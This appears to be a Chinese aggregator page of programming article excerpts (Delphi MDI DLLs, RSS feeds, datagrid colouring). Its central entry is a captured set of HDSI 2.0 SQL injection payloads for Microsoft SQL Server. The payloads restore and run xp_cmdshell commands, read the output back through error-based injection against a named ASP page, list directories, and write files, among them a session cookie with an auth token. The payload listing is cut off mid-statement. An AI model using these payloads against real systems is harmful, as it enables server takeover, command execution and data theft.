摘要:用dll方式封装mdi子窗体是一种常用的软件开发技术,它的优点:开发人员可以负责某一个模块的编写包括(界面+逻辑),可以互不干扰,模块开发完成后,主程序统一调用。易于程序升级,当程序升级时,不用编译主exe文件,更新某个dll就可以升级。可以根据客户不同的需求、价钱给他们不同的模块。(奸商都愿意用这招)最近用到这个技术,因为小弟没有用过,在网上google了一下,对它有了了解,我用的是基于com的......
摘要:创建网站的 rss 内容摘要 发表时间:2004-8-10作者:未知[获得此文档时候没有作者记录,深感抱歉,本文档全为转载] rss 是一种“轻量级、多用途、可扩展的元数据描述及联合推广格式”,也可以理解为一种规范。它本身是一种 xml 格式,用于为内容整合客户端提供选择性的、汇总过的 web 内容。如今,许多站点都开始通过创建 rss feed 向浏览者提供内容整合服务,......
hdsi2.0 sql注入部分抓包分析语句
hdsi2.0 sql注入部分抓包分析语句
恢复cmd
;insert tb1 exec master..xp_cmdshellnet user --
;exec master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
执行命令:
sql: ;ipconfig -all--
dos:
;drop table comd_list ;create table comd_list (comresult nvarchar(1000)) insert comd_list exec master..xp_cmdshell
"ipconfig
-all"--
get /plaza/event/new/crnt_event_view.asp?event_id=57
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from [comd_list] where 1=1)>0
列目录:
c: jiaozhu 临时表
;drop table jiaozhu;create table jiaozhu(dirname varchar(100), diratt varchar(100),dirfile varchar(100)) insert jiaozhu
exec
master..xp_dirtree "c:",1,1--
get /plaza/event/new/crnt_event_view.asp?event_id=57
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from [jiaozhu] where 1=1)>0
上传文件:
本地路径:c:\inetpub\wwwroot\cook.txt 保存位置:c:
数据库存储过程:
;exec master..xp_cmdshell echo
cdb_sid=3urzov;%20cdb_cookietime=2592000;%20cdb_auth=vgccbajbvqxvavmcvghtbfjuuqydbqdtv1bwvqokaqe6pwnx;%
20cdb_visitedfid=12;%2
0cdb_oldtopics=d8d>c:\--
数据库备份:(上传后删除临时表)
;drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--
;insert into xiaopan(cmd) values( echostr )--
;declare @a sysname,@s nvarchar(4000) select @a=d...
下一页 摘要:在delphi中的datagrid怎样使它显示的行间隔改变颜色?就向.net中同名控件一样。 --------------------------------------------------------------- 好像是在 ondrawdatacell 事件中写代码。 -------------------------------------------------------------......
